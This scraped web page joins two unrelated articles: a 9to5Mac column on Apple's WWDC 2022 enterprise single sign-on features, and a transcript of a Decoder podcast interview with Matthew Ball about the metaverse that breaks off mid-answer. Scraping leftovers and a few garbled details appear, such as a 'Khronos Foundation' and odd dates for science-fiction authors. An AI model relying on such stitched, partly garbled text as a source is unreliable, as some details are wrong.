In the podcast I did from 2012 to 2017 with Fraser Speirs, I became very focused on identity becoming a central part of the IT management experience. This time period was during the continued transition from on-prem servers and services into SaaS becoming the default. Apple’s vision for single sign-on in the enterprise took a continued march with WWDC 2022, so let’s look at what was announced regarding SSO, IDP and Apple’s identity vision for the enterprise

About Apple @ Work: Bradley Chambers managed an enterprise IT network from 2009 to 2021. Through his experience deploying and managing firewalls, switches, a mobile device management system, enterprise-grade Wi-Fi, 100s of Macs, and 100s of iPads, Bradley will highlight ways in which Apple IT managers deploy Apple devices, build networks to support them, train users, stories from the trenches of IT management, and ways Apple could Boost its products for IT departments.


OAuth 2 support

In iOS and iPadOS 15, Apple used a simple access token authorization mechanism to allow the device management server to verify a user’s identity. In iOS and iPadOS 16, Apple is taking it to the next level by adding OAuth 2 support. OAuth 2 support will allow MDM servers to support a wider variety of identity providers who are already compatible with OAuth 2. Instead of building a custom integration, MDM providers can leverage OAuth 2 for any provider that supports it.

Enrollment Single Sign-on

Enrollment Single Sign-on is a new method for personal devices to complete an MDM enrollment and access company apps and web SaaS platforms with a single authentication. Once you obtain an app that’s compatible with Enrollment SSO, a user can be automatically logged in with their Managed Apple ID that’s synced to Azure AD or Google Workspace. In order to use Enrollment SSO, you’ll need:

  • An app that’s been configured to support enrollment SSO
  • MDM solution that’s been federated with an identity provider
  • Managed Apple ID created in Apple Business Manager (or Apple School Manager)
  • An MDM server that’s been configured to return information the app needs to authenticate the end-user

Enrollment Single Sign On won’t be available at launch, but will come in a later update to iOS 16.

Platform Single Sign-On

Apple identity

In macOS 13 Ventura, Platform Single Sign-On allows end-users to sign in once at the macOS login window and then also be signed in to apps and websites that are compatible with the identity provider the company uses. An example here would be signing into macOS using Okta at the login window, and then automatically be logged in to a Slack and Jira instance that uses the same IdP. Apple said that Platform SSO is the modern replacement for Active Directory binding (good riddance).

Summary on Apple’s vision for identity

Apple announced some exciting things at WWDC 2022 relating to its vision for identity. These announcements are just the beginning of this process as MDM and IdP vendors will need to build in support as Apple releases this functionality later in the iOS 16 and macOS Ventura release cycles, but the vision is indeed a compelling vision for the future of identity in the workplace.

FTC: We use income earning auto affiliate links. More.


Check out 9to5Mac on YouTube for more Apple news:

Fri, 08 Jul 2022 23:15:00 -0500 en-US text/html https://9to5mac.com/2022/07/09/apple-identity-vision/
Killexams : Is the metaverse going to suck? A conversation with Matthew Ball

Let’s talk about the metaverse.

You probably can’t stop hearing about it. It’s in startup pitches, in earnings reports, some companies are creating metaverse divisions, and Mark Zuckerberg changed Facebook’s name to Meta to signal that he’s shifting the entire company to focus on the metaverse.

The problem, very simply, is that no one knows what the metaverse is, what it’s supposed to do, or why anyone should care about it.

Luckily, we have some help. Today, I’m talking to Matthew Ball, who is the author of the new book called The Metaverse: And How It Will Revolutionize Everything. Matthew was the global head of strategy at Amazon Studios. In 2018, he left Amazon to become an analyst and started writing about the metaverse on his blog. He’s been writing about this since way before the hype exploded, and his book aims to be the best resource for understanding the metaverse, which he sees as the next phase of the internet. It’s not just something that you access through a VR headset, though that’s part of it. It’s how you’ll interact with everything. That sort of change is where new companies have opportunities to unseat the old guard.

This episode gets very in the weeds, but it really helped me understand the decisions some companies have made around building digital worlds and the technical challenges and business challenges that are slowing it down — or might even stop it. And, of course, I asked whether any of this is a good idea in the first place because, well, I’m not so sure. But there’s a lot here, so listen, and then you tell me.

Okay, Matthew Ball. Here we go.

Matthew Ball is the managing partner of Epyllion and the author of a new book called The Metaverse: And How It Will Revolutionize Everything. Welcome to Decoder.

Glad to be here.

You are also the proprietor of an excellent Twitter feed about the metaverse. Do you think of Twitter as your primary platform?

I do. It is my most used app. TikTok is creeping up there — and of course my Screen Time doesn’t register Fortnite — but Twitter is definitely my primary channel and where I learn the most.

You have been tweeting about the metaverse for quite some time, and you obviously have a big audience on Twitter. From a media nerd perspective, why turn it into a book?

Thanks for the tee up. I started writing about this fascinating syllabu in 2018. The term comes from the early ‘90s, but the ideas span back to the ‘30s. This truly century-old idea was finally practical, that is to say, we could start building it and trying to realize it. Over the following years, I got smarter in the area, received more input from other people, and more projects came to bear.

Then suddenly last year it became the word du jour. Not only did Facebook rename themselves, but Google also did a reorg, Amazon started redoing job descriptions, and many of the fastest-growing companies in media tech — Roblox, Unity, Epic — wrapped themselves around the theme. Yet there was very little actually articulating what it is, why it mattered, and what the challenges were.

I was really excited about crystallizing that, distilling my thinking into something more concrete, updating the things that I got wrong, making sure that it was comprehensible, but the most important thing was actually social. Every time we have a platform shift, we have an opportunity to change which companies lead, which philosophies, which business models. I think many people are coming out of the last 15 years dissatisfied with the lack of regulation, the take rates, the role of algorithms, monetization, and which companies lead — and who leads, frankly. The best way to positively affect that outcome was to be informed about what was next. That is the goal.

We have to start at the beginning. There are a couple chapters at the beginning of the book where you talk about that long history and how it has built up to this moment. The third chapter is called “A Definition Finally,” which is great because I feel like the definition of the metaverse really does need that “finally” moment. What is your definition of the metaverse?

I cheat here a little. It is more helpful to describe it similarly to defining the internet as TCP/IP, the internet protocol suite. The description is what is more helpful.

It is a massively scaled and interoperable network of real-time, rendered, 3D virtual worlds that can be experienced synchronously and persistently by an effectively unlimited number of users, each with an individual sense of presence. It has the technologies, capabilities, and standards to support what is essentially a parallel plane of existence that spans all virtual worlds and the physical world. From a human outcome, it means that an ever-growing share of our time, labor, leisure, wealth, happiness, et cetera, will exist in virtual spaces.

One of the key pieces of that definition is “3D virtual worlds.” I have heard other definitions of the metaverse that are a little bit more expansive, that get you to a place where Wordle is the metaverse. We are all doing it together once a day, so we exist in the universe of Wordle, however that universe is defined. You are saying this has to be 3D; it effectively has to be a video game. You get to a place where Fortnite, Roblox, or any number of other massively multiplayer online games is the metaverse. Does that count for you?

It is really a question of “what is” versus “what connects to and is part of” it. My building that I am speaking to you from right now is not the internet, nor really on the internet, yet it is part of the internet in one way, shape, or form. Wordle, of course, is mostly locally run on your device. You would not really call it an internet service, but some of it is delivered.

When you are talking about the metaverse as a new computing platform, for me, 3D is a requirement to do many new things, to elevate human existence — especially in key categories such as healthcare, education, and so forth — but the term really does not matter. What is in and out does not matter. It is likely we never say “metaverse.” In China, they have adopted the term “hyper-digital reality.” We may talk about the 3D internet, or we may just use the term internet. What matters is the real-time rendered element, which basically means the world as it exists is legible and changeable to software, and the advent of graphics compute. It does not need to be a game, it is just an expression.

I understand what you are saying. It is the description that matters, and this word may go out of fashion. Let me just push on that description and definition a little bit.

Right now you can log into Fortnite and run around with a bunch of friends. It is cross-compatible with many different kinds of devices, so it does not matter what hardware you have in your house. You are in a persistent online space where lots of other people are. Are you saying that because Fortnite does not connect to Roblox, it is not the metaverse?

This would be a little bit like asking, “If AOL ran on multiple different devices and a few different networks, is that the internet?” We could say it is, but if you talked about just AOL services in particular, you would be talking about a proprietary platform. You would not be talking about a unified experience that spans into industry with myriad different outputs, servers, or domain registrars.

The metaverse is really describing that unified experience, rather than a single expression, much like we would not say Facebook is “an” internet or “the” internet. When you are talking about Fortnite, there are certainly a bunch of things that do not fit there. It is not actually a persistent experience, and there are very few people who can connect to it at one point. Nominally, there are 100 people in a match, but they use a bunch of cheats so that there are only really 12 people that matter. It also does not connect into anything that isn’t purely game-like and leisure-oriented.

The definition of the internet at its most basic levels is a network of networks. You are connected to the network at university, work, or home, where you can go out and connect to Amazon’s network of servers to browse, then leave Amazon and connect to Facebook’s network of servers to do stuff there. You are saying the metaverse is the same thing as that overarching network of networks; it is the connectivity between multiple, different 3D worlds.

That is right.

What I would push on there is that the internet did not have to be built that way. The AOL example is very interesting, because AOL did not want it to go that way. The value plummeted when AOL went from being a provider of first-party services — like chat rooms, groups, and email — to an ISP that connected you to better versions of those services run by other people.

What is the push for Epic Games or Roblox to enable that connectivity? Historically, the people who own those experiences faced a raft of competition the second they gave them up. They kind of became dumb pipes and disappeared.

Let’s pause for a second. Of course, that was not the necessary outcome for AOL. We know now that no matter how successful AOL might have been in expanding its geographic footprint in connectivity, the largest opportunity for them was in horizontal software and services. There is a world where AIM, AOL Instant Messenger, becomes one of the world’s most significant communication platforms, like WhatsApp or Snapchat. There is a world in which its search engine turns into one of the world’s most dominant ad networks.

Microsoft is a pretty good example of that. They have never had a smaller share of computing devices, hardware, or operating systems, but their horizontal business is far more valuable than ever.

When you are talking about the incentives, first of all, we are already seeing this progress. The Roblox founder and CEO has been talking a lot about their explicit designs for interoperability. They have open-sourced some of their scripting languages, and he is even talking about embracing NFTs to take some projects off of Roblox.

Last week, the Metaverse Standards Forum was established by the Khronos Foundation — 28 companies such as Qualcomm, Epic, Meta, and others — specifically to solve this problem. Coming together is the easiest part. It is not forcing anyone to make a concession yet, to pick something that they did not advocate for, but is all in service of expanded network effects.

The belief is if consumers can buy 3D objects that can be used in more places, or encounter history that has more persistence and utility, it will grow much like the world economy, did through trade. There were individual instances of compression with some markets, some products, and some countries, which suffered from time to time, but the network was much stronger.

I will say you are right that the internet could have gone a different way, but we did have many competing inter-networking standards. There was a point in time in the early ‘90s where the Department of Commerce and the Department of Defense disagreed and pushed different standards. The idea that Comcast could email IBM, could email Telefónica, could email China Mobile, was really not the consensus. We had the protocol wars, but network effects and utility won out in the end.

The idea of a Metaverse Standards Forum is very funny to me. When covering consumer technology, you come up against standards bodies all the time, and they are hyper political. I would not say that Bluetooth is an example of the tech industry making something great that everyone loves, but it is pervasive in its way. The beginning of a standard and that early energy is great.

At some point, dollars are going to get allocated across whatever the metaverse is, and owning the early access points seems really valuable. This race and amount of hype we are in now, is it really about initiating the customer into whatever the metaverse is, to make sure that every time they buy something in another 3D world, you will get your 30% cut? Or is it, as you were saying at the beginning, that the technical ability to start building an early version of what you might consider the metaverse a net good? Should we just start doing it and see what happens along the way?

I think the latter is more likely, but it is more of an organic process. If you take a look at one idea that we have long believed would have utility, a federated universal identity in digital space, Microsoft has tried that multiple times. The .NET Framework was the last big time they tried, but no one wanted it. It was rarely deployed, for many of the reasons you just mentioned. I do not want to use Microsoft’s account system.

What happened to be the best way to build the de facto standard for identity was Facebook, which started as a college hot-or-not. The best way to build a or the metaverse for Epic was not by trying to build it. It happened to be a battle royale game that was not even intended to be a battle royale. That is to say, this process starts from building something tangential, that is 3D-oriented and social, that connects into another thing. Then you start to get organic alignment around that standard set.

You are right to be skeptical when someone says, “This is the thing, let’s all do it.” It rarely happens that way. It is actually more power-based.

You have described the metaverse as this parallel reality that you can live in and transact in, that will grow an economy that mirrors the world economy, because we will figure out some way to have scarce digital goods. I will come to the blockchain portion of this conversation later, but that is what you are describing.

In science fiction, where the word metaverse comes from, that vision is always dystopian. In the book, you refer to Neal Stephenson’s Snow Crash a lot, and you point out that the metaverse in Snow Crash made life in the real world notably worse. The heart of tension for me is the idea that we will build a parallel world and end up as so many brains transacting on other people’s platforms. I have an instinctive recoil from that which makes me skeptical of the entire enterprise, because I think life in the real world is actually rich and rewarding. I can go out and touch grass, and Apple, Google, Facebook, Epic, or whoever cannot get in the way of me doing that. Fundamentally, what makes this not the dystopia that it is always described as?

I agree with a lot of that and disagree with some of that. The literature for the metaverse in its antecedence is dystopic. One of the important reasons why that is the case is because the point of most fiction is human drama, especially science fiction.

Put another way, utopias tend not to make for much human drama. This is true that when you look at Neuromancer, The Matrix, Ready Player One, or back to the 1930s with Philip K. Dick and Isaac Asimov; these virtual planes of existence are not described favorably. Why? Because even when they are not negative in and of themselves, they lead to some disengagement with reality, and that is the problem. The technology is amoral, the consequences are not.

When you take a look at the genuine examples to build these things, whether that is multi-user shared hallucinations in the ‘70s, Second Life and other metaverse-style experiences from the ‘90s, or Roblox and Fortnite from the 2000s, the tone is very different. It is not dystopic, it is creation, exploration, identification, and collaboration. Those are all very important.

At the end of the day, I don’t know that scarcity is that important, and this is actually where I think I disagree with many of my peers in the investing community, especially in relation to the blockchain. I don’t really get virtual land, certainly not scarce virtual land. The two brilliant things about the internet are network effects and zero marginal costs. Trying to create a next-version of the internet that constrains networks through money and introduces scarcity that need not be there, for a virtual plane of existence that does not actually need to simulate the real world, I don’t get and frankly don’t believe in.

We have done a lot of interviews with various Web3 folks on the show. I would say some of the themes there echo the themes you have brought up. There are a lot of people who, having built or invested or experienced the last 15 years of the internet, are dissatisfied with where we have landed. Can we build a new kind of internet that more effectively rewards creators and is not just about engagement metrics?

You talk about the metaverse and say, “Okay, I want to have digital goods. I want to buy and sell things here that create a world economy that rivals the real-world economy.” How do you do that without scarcity? Are we going to DRM all the virtual clothes? There is an element here that you need to create some sort of scarcity if your goal is to buy and sell 3D digital objects at a rate of transaction that mirrors the real world.

It is really interesting. This is where we get into a fundamental break between how different believers in the metaverse actually imagine the value. Just as I am not a believer in scarce virtual land that costs thousands if not millions of dollars, there is probably a pretty low ceiling to virtual goods and apparel. They are usually in support of experiences. It is either the experiences that drive the underlying value — as is the case in Fortnite — and not the items per se, or it is what we would consider graphics-based computing or simulation at large.

Let me make that less abstract. Jensen Huang, the founder and CEO of Nvidia, now the seventh-largest company globally, believes that the economy of the metaverse will eventually exceed that of the physical world. We are talking 51 percent, which would be $50 trillion per year in spending right now. He is not at all interested in virtual clothes or leisure. He is talking about real-time 3D simulations running the world’s best development platform, which is the world. A building or infrastructure, where goods flow and why, how you programmatically advertise in 3D space, often for physical things, certainly does not require scarcity of the odd avatar.

Explain that a little more directly. When you say the best development platform in the world is the world itself, do you mean the 3D environment that you are in?

I mean the physical world, the one that you are standing on and exist in right now, which has many of the attributes I mentioned such as persistence, maximum capacity, et cetera. I will provide two examples that are perhaps helpful.

Nvidia redesigned its headquarters with a real-time, rendered 3D simulation to understand every design choice. “What happens when you put a piece of window in one spot, or use one construction material or another? At exactly 3:22 p.m., November 22, what is the climate implication in the conference hall? How do you simulate the flow of energy, of heat, or the refraction of light to drive energy to operate the building?”

We are seeing that premise being used to operate airports in real time. “Do we really want to move the flight from gate 82 to gate 80 because it is close by? Should we actually move it farther away for operational efficacy and safety reasons in case there is a flash flood, fire, or terrorist event?” We are talking about making the entire physical world with an augmented layer on top of it that is legible to software in real-time, impacting production flows in a factory or the flow of people in a facility and so forth.

Connect that to the metaverse for me. This is a concept that is often called digital twins. You build an operational, digital twin of an airport or your office building, and they can proceed down different timelines based on different choices to provide you a sense of what might happen if you make changes in the physical world. Do they interact? If someone is going from the digital twin of your office to the digital twin of the airport, is that where you think the metaverse is?

I think the idea of simulating physical environments more directly, more accurately, is very powerful. The idea that there will be some layer of commerce in those digital twins that is independent of what is happening in the real world seems like the big step.

There are two things to unpack. Number one, digital twins are not the metaverse. If the internet is a network of networks, of different autonomous systems exchanging information consistently under common protocols, then a digital twin is like an office network. It is the Vox ethernet.

It is the interconnection with other digital twins, other simulations, for the exchange of information — your user identity, your payment history, or your avatar if you so choose — that collectively produces the metaverse. In this instance, there is not necessarily any utility or purpose for you, the consumer, to explore the digital twin of the environment you are in.

You might wear augmented glasses in 2037, in which case a version of that digital twin is being overlaid selectively to you, but I don’t agree with the premise that we are going to navigate an airport by putting on a headset or taking out our device.

Are you saying you don’t agree with the premise that there will be pervasive augmented reality?

No, I do. My point is the digital twin, at least foreseeably, is a B2B application, not something that you, the consumer, is going to log into and explore. There is very little practical value right now in you saying, “I want to go navigate MIA, the Miami airport, in a 3D digital twin.” It is not interesting or useful. That does not mean it isn’t super valuable to the operator.

As you describe this, there are a bunch of very hard, technical problems to solve to make this all work. If I build a digital twin on Nvidia’s platform of the airport and someone builds another digital twin on another platform for the office building, it is not just me, the builder of the digital twin, that needs to want to inter-operate.

The platforms need a core capability to inter-operate. If I want to jump from Roblox to Fortnite, those companies have to agree that my avatar can go between the worlds. If I buy a gun in one video game and want to go to another video game where that gun is 100 times more powerful, I might just wreck it for everyone. Some of that is a very difficult technical problem, some of that is cultural, and some of that is straight up business and politics. Have you seen the beginnings of solutions to those problems?

You’re right. Most technology problems are only masquerading as technical problems, and are actually business and/or societal problems, as in “can we agree?”. In the gaming community, I see limited benefit from taking your gun or avatar from one environment to another. That is not to say that there isn’t some utility, particularly with cosmetics with no functional value. It is easier, but at the end of the day, how important is it that I can wear a banana peely skin in Call of Duty? Probably not that important. The technical impediments, not to mention the commercial and creative ones, are pretty high.

When you take a look at industrial simulation, the utility there is a lot higher and the technical solutions are already in place. You mentioned Nvidia’s omniverse platform, which is not really a platform in the same sense as Roblox or Minecraft; it is actually more of a middleware simulation DMZ. It is actually where DeSo and Boeing take their simulations and interconnect them, with Nvidia’s machine learning upscaling, downscaling, translating, and then operating that simulation.

There is a lot of work to do if you want to talk about the progress. We do have some standards groups, but there is an old xkcd joke that basically says when 14 people disagree about 14 competing standards, you get a 15th standard that no one uses. So I don’t want to be too optimistic there.

What you see with Epic is one potential example. They launched their Epic Online Services, a live services suite where independent game developers can access Epic’s 500-million-account user base with 3.5 billion user connections — and at this point $30 billion in invested avatars and skins. This is just like The New York Times tapping into Facebook’s account system to speed up the user flow. Not to say that they don’t prefer their own account, but they recognize there is utility in getting some information.

You and I can go make a game and then access Epic’s avatar suite and its users, therefore driving from smaller developers, who are less endowed technically and financially, to consolidate around their conventions, their file types, and their engine to tap into their networks.

I feel like we are bouncing back and forth between where the money is now and where the money will be in the future. To some extent, this is making my head spin. You are saying the money in the future is not just avatars, skins, and items. It is some massive B2B market where the real world is being simulated at a level of high fidelity, and some revenue will be created there as different businesses find different things to do for each other. The money right now is very much in Fortnite skins, right? How do you go from one to the other?

I don’t mean to oscillate between the two points. My point is rather that when people express skepticism as to whether or not standards and interoperability can be achieved, it is important to say that progress is happening. We had cross-platform gaming in 2018, we now have common account systems and entitlement systems for Epic, and we have the omniverse platform for Enterprise.

The fundamental tension you are talking about stems from the fact that, for decades, game engines, 3D simulations, have essentially been good enough for leisure and not much else. Unreal, for example, is a non-deterministic physics engine. That means that if you throw a grenade eight times, you might get seven different answers, somewhat.

It is only recently that the fidelity and sophistication of the simulation, and the investment that Epic has made into vertical solutions, make it practical enough for deployment in healthcare, military, education, and automotive. We are very early on that deployment curve. You need to get it right, then you need people to adopt it and so forth.

That is one of the reasons why we struggle with this odd juxtaposition of talking about the trillion-dollar metaverse economy while turning over and saying, “Right, but we are talking about $200 billion in gaming spent mostly on cosmetics.”

I just keep coming back to the notion that the metaverse is the inter-connection between these worlds. That is where the value multiplier is. You can build all this stuff as one-offs, and all you have really ended up with is AOL and CompuServe. If you connect those things together and to 100 different networks and servers, then you have multiplied the value of all of it. Everyone rushes into it because it is so compelling that you cannot say no. Suddenly we end up in 2022, and every now and again I’m like, “Maybe we should turn it off.” It eats the world in a way that seems remarkable.

The immediate, compelling use of the internet was obvious to everyone, in the sense that if you wanted to look something up, you could just do it faster. Wikipedia comes into existence and suddenly the Encyclopedia Britannica seems unwieldy, old, and not up to date anymore. The other day I wanted to figure out how to cook something, so I watched a YouTube video and that was the end of it. I knew how to do it and we were off to the races. Whrere are the compelling, immediate uses of the metaverse that showcase that multiplicative effect, beyond just getting to the Boeing simulation faster?

To start with, I would personally disagree that the utility of the internet was self-evident. I mean, we have the classic Paul Krugman example in 1998.

Well, I am not saying some people weren’t wrong. I’m kidding around when I say that I was just smarter.

No, I agree with you. One of the weird things is that transition point was actually relatively late. Even as late as 1996, there were fewer than 50 million Americans who would use the internet in a month, and most of that use case was pretty frivolous. When I was in high school, Wikipedia was seen as deleterious, that it actually worsened education. I think that is part of it.

What we are seeing here is network effects. I don’t mean to be evasive, but we are talking about combinatorial innovation that is not yet present and therefore remains speculative. Take a look at the world economy, as an example. It is not that having independent nations and industries wasn’t hugely profitable, it was that the utility of all investments of all products in all markets went up.

In the social era, we easily take for granted that anything we create works everywhere. I create text, audio, video and I can take it anywhere. I can take a photo with my iPhone, it stores to iCloud, and I don’t have to say, “Well, darn, now I can’t put it on Facebook.” I can put it on Facebook, right click, save as, upload it to Snapchat, screenshot it on Snapchat, and put it into TikTok.

The utility of global commerce and trade, the utility of having common file formats, is really profound on the internet. It is so hard to create in 3D. Then you have this issue where the thing you want to do in 3D is a different system from your partner. Unity and Unreal actually use different XYZ coordinates, if you can believe it.

It is kind of intuitive at this point to say we have had hundreds of billions of dollars in 3D assets invested, and all of those essentially get deprecated after their first use. That means that we either need to remake them, or we just will never use them. That is part of the premise here.

I will provide you a counterexample. Emoji is a big standard. It is run by a consortium, but it is rendered differently by every phone, by every platform. So the smiley face emoji…

I am an Android guy, I know it well.

It’s the grimace emoji, right? On Samsung phones, for a long time, it looked like it was smiling. Samsung owners were sending people grimaces when they meant they were smiles or vice versa.

You have a 3D file format, and everyone has agreed, “Okay, this is the one.” How do you make sure it is rendered across all these systems? Over time, will Samsung have to realize, “A lot of people are confused by our emoji, we should come together with Apple and make sure they look the same”? Google had to go from blobs to faces, which was very controversial in the virtual world, I will point out.

I like the blobs.

People love the blobs, and Google got rid of them because Apple is dominant and they needed to conform to what Apple emoji looked like. Do you see that playing out with 3D objects? Will an outfit or briefcase in Fortnite eventually come to dominate what it looks like everywhere else?

The example with emoji is a good one. It shows where slow-moving standards bodies, even when they are successful, end up being corralled through standard participants. They are not overtly saying, “Here is what the standard should be,” but drive all of the other members along. That actually helps with standardization.

When you are talking about 3D objects, there is a large contingent who believe that the consumer-facing 3D objects are less important. Bringing your briefcase from one environment to another is less important than having the environment itself be useful or repurposable for more developers. As an example, take the investment that Disney has made into Hoth, and make that into a virtual biking course used by Peloton, a dating simulation on Tinder, or a theme park in Fortnite. That is probably more useful.

When it comes to your question of visual cohesion, it is not just a question of how you want to express it. What dimensions do you need? What pixel density do you have? The technology for machine learning, particularly from Intel, to up- and downscale is pretty strong. You can take a 2D object and 3D-ify it. You can say The Verge makes virtual shoes that don’t separate between the sole and the fabric, but our system can actually separate the two for different designs. A lot of that is going to be interpretive software that takes what is not standardized and modifies it.

I feel like this is beginning to unlock for me in an important way. Unreal has moved into Hollywood, and it has moved into cars. You see this graphical engine appear in more and more places where graphics need to be rendered. So The Mandalorian renders the background on giant LED monitors behind the actors in Unreal, and now that same virtual world is available for Peloton to say, “We are going to bike through this environment.” Is that somehow an open platform for that kind of development?

You are quite right. Let me frame it a slightly different way. Entertainment is such a good example. Disney will spend $100 million producing backdrops in virtual environments for a film. Those are essentially all deprecated. They are increasingly used for the next film, but that is about it. What does that mean?

Well, if Peloton wants to build a Star Wars biking sim, they need to build it all. The business case might not be there. In addition, Disney might say, “Well, we have to make the thing, then we have to brand approve the thing, so we need to charge a lot.” So a lot of this does not happen. Once you start to standardize these 3D assets, you start to say, “We have made this investment and now we can use it wherever we want, or at least more extensively without building it anew.”

You take that from consumer leisure to, “Well, Ford has dimensionalized its next Ford Escape, so now we can simulate it in other enterprise environments, such as a car park for parking simulations.” A Hummer vehicle can use its lidar sensors to map the local area, then you can pre-drive that environment, like you would in a video game, to make sure that you can make the path. Making all of this information more repurposable starts to have extreme combinatorial effects, either by making new creations easier or cheaper.

Who controls the access and the connections between those things in your view of the metaverse? That seems like a very powerful vision, but then I start to pull the thread. If Disney has rendered out the world of The Mandalorian, I’m like, “I want to make print versions of The Verge for The Mandalorian.” I can imagine all these things we could do, but it feels like I still have to go get permission. The asset may be cheaper, but over time, content creation gets cheaper and cheaper anyway. Where does the technical part of availability come from? That seems like the hardest problem that we have been talking about.

There is no simple answer. These environments are managed centrally, and their permissions are going to be managed deliberately to start. If we have learned anything from the era of Shutterstock, TurboSquid, Quixel, or 3D asset databases, it is that the most valuable stuff, the IP, is not easily or cheaply licensed.

This is where we get into one of those fundamental questions of decentralization versus centralization. There are good arguments to be made that the last 15 years were too centralized, because the internet protocol suite has too little in it. We can get into that one way or another, but there are many forms of centralization that have nothing to do with technology per se. Revenue leads to greater investment and better products. IP centralizes or drives habit and retention. Brand keeps people inside of a system that they trust more than another.

This is the case even if you believe that the metaverse is a big, disruptive, next-generation internet, or if you believe in the wide deployment of blockchain and Web3 to democratize more of the stack. OpenSea is a great example of how we may still end up with no technical barriers to switching, but enormous habit and brand-based, or IP-based, stickiness to a few.

I feel like we have arrived at the Web3 portion of the conversation, so let’s talk about it. The ideas are in parallel, right? The amount of Web3 hype that has happened over the past 18 months is right next to the amount of metaverse hype. It feels like everybody wants to conflate them for some reason. Certainly, it is trendy in the business world to conflate them, to juice your stock price in some insane way.

They are not necessarily connected, but it does feel like the game of, “What are some use cases for Web3?” is best answered by, “There will be scarce digital objects in the metaverse.” There is a connection there. The open, technical questions of how these 3D worlds might work and how you might transact in them are actually answered by the blockchain, by Web3 technologies. Do you see that connection as directly? Do you think it is just a quirk of timing? Do you think there are other possible solutions?

I think that there are a few different things that we can unpack here. First and foremost, I and others, like Mark Zuckerberg and Tim Sweeney, describe the metaverse as a successor state, or quasi-successor, to today’s internet. Web3 is so named because it succeeds Web2. If both things come after the current thing, it makes sense that you have conflation.

In addition, there is a good reason to believe that the philosophies at minimum, or perhaps the technology at maximum, of blockchain are essential or important to the metaverse. Which is to say, property rights are probably going to be important, as they are to most economies. The ability to tap into decentralized or wide networks of contributors to provide extra GPU cycles, broadband, or just time and assets, which are currently hard to accumulate from individuals — Patreon only scales so much —are good reasons to believe that it is important to have a thriving metaverse, one that we want rather than one that is just technically possible.

I understand why the two are conflated, but I would say that they are separate. When you are talking about a good technological solution, when you talk about interoperability, you need a standard. You need someone to effectively take custody of an object and you need everyone to agree that they trust it.

The big problem that we have right now is EA and Activision do not have a good system to exchange anything. They certainly do not want to use one another’s new thing, should it exist. When other aggregators like Steam have tried in the past, no one opts in because the platform is already powerful enough.

Irrespective of whether or not blockchains are actually the ideal solution, they clearly have some revenue attached, speculative or not. They are proving themselves to get a wide collection of different deployed solutions. At the end of the day, it is not always important whether something is perfect, insofar as whether or not everyone uses it. The GIF file format is awful. We have known that for decades and yet everyone uses it, and so that ends up being the thing. That to me is part of the case.

One of the very hard problems with all of this is the amount of compute that is required. We are going to render a bunch of persistent virtual worlds that have unlimited maximum capacity, then potentially we are going to run blockchains to manage scarce digital goods inside those virtual worlds. That is a lot of compute; it is more compute than we have right now. Do you see that coming down because of Moore’s Law? Is TSMC going to figure out the next process node and we are just going to get there? Is it an agglomeration of other kinds of compute? Who builds this stuff? Where does it come from?

There are three dominant theories here. One is just Moore’s Law, slowing or not, continues to improve, and as part of that we get better at compression. We start to prune out the inelegant data formats and architectures, just like moving off of GIF to MP4 for lighter performance.

The second school is really organized around more efficient resourcing. This is the cloud argument. There are problems with it, but the argument would basically be that it is kind of stupid that we put the most intensive computing at the individual user, whose device has to be affordable, lightweight, and replaced every two to three years, versus the power plant approach of saying, “No one should have a generator in their home. We should deliver it from industrial scale.”

Then third are the bigger punts. There is a large contingent of people, Intel or TSMC, who are starting to believe that quantum computing — another idea that has long been considered fanciful — is no longer a crazy thing to believe in and ends up being essential.

The last and the most fun is decentralized computing, not necessarily in the blockchain sense, but in the solar panel sense. I am sitting talking to you right now. I have two consoles with incredible GPUs both sitting unused. There may be someone in my building right now who could use that. Right now they either do not have it, or they need to rent it from a data center that is expensive and far away, thus producing latency. Do you have a model potentially on blockchain or not? Is that a more effective system of renting out excess capacity, like a solar panel, or like Elon imagines Teslas will do in a self-driving car?

I love that idea and have heard variations of it for a decade now. I used to run SETI @ home on the computers at the college computer lab that I managed.

It is in my book. It is so fun.

It’s all right there. We have been chasing it for a minute. That requires that your personal power bill might go up and down in ways that you cannot predict. Your bandwidth might get strained in a way that you cannot predict. It would be sad if right now our call was diminished in quality because someone was running the GPU in your PS5 at 100 percent.

On top of that, at least in this country, the bandwidth required to do that is actually not evenly or equitably distributed. Some people have really fast connections, and many people have bad connections. There is virtually no competition for those connections whatsoever. You can make that bet, but you think about how it would play out in practice and it just feels like a lot of people will be selfish, first of all. That seems like a thing you can count on. Then second, the infrastructure to actually pull that off does not really exist.

I agree with you. I characterize it as the fun one because it remains the elusive one, just like when we talk about peer-to-peer servers for multiplayer games. It is a fun idea, but no one has figured out how to do it.

There are some technical solutions, of course, one of which could be that you do not necessarily need to congest the neighborhood if you geographically constrain who your GPUs are available to. You can also have different bidding. One of the problems I talk about in the book is the fact that we actually have very poor systems in TCP/IP to manage the prioritization of traffic once it leaves our network. I am not talking about paid peering or net neutrality, but literally the ability to differentiate if it needs to be there in 10 milliseconds or 50 milliseconds.

These are actually more fundamental issues. We do not have an effective way to split GPUs. It is not like you can say, “I need 80 percent of it but the remaining 20 percent can go.” I will say that there are some systems for this that are being deployed. J.J. Abrams and Ari Emanuel are on the board of a company called Otoy. They have a blockchain-based system called the Render Network, and it is designed to do exactly that.

An architectural firm that perhaps does not need its high-end GPUs overnight can rent those out on a bid-ask, blockchain-based system, and Hollywood studios do use them. This is not the expectation of every single person’s sitting devices used minute to minute, but we are starting to see it work on a more regular basis for industrial use cases with high-end, low-supply hardware. I put this in the, “if you woke up in 2045, it might be answered” bucket.

Let’s wrap up here by talking about the companies that are building this stuff now and where they are. You run an ETF called Meta that invests in various metaverse companies, and you obviously pay very close attention. Let’s start with the obvious candidate here, Meta.

In your book, you call it Facebook, because it is too confusing to call Meta “Meta” in a book with a metaverse, which I appreciate. Facebook obviously rebranded itself to Meta, Zuckerberg is all in on this pivot to the metaverse. In VR headsets at least, they are the market leader; the Quest 2 is a really good consumer product. Though I do not know if it is a metaverse product, since it is a pretty closed system. But they are ahead. How do you think they are doing and where do you think they go next?

I would say that the Oculus device is actually pretty open. They support side loading, and they do not require a central identity system. You can use alternative payment solutions for side-loaded apps, which is not even side loading, it is just not app store direct. The Oculus is unique in that it is effectively the only mainstream console that uses open standard rendering collections, WebGL, OpenGL, WebXR. Those are pretty significant. No one else did it. PlayStation 3 did, but PlayStation has never done it since.

The truth is, if you were to talk about number of users, amount of spend, number of developers, amount of developer profits, and cultural impact, they are frankly nowhere near leads like Roblox, Fortnite, Minecraft, or Unity on the B2B side. They also have a much harder path to doing that.

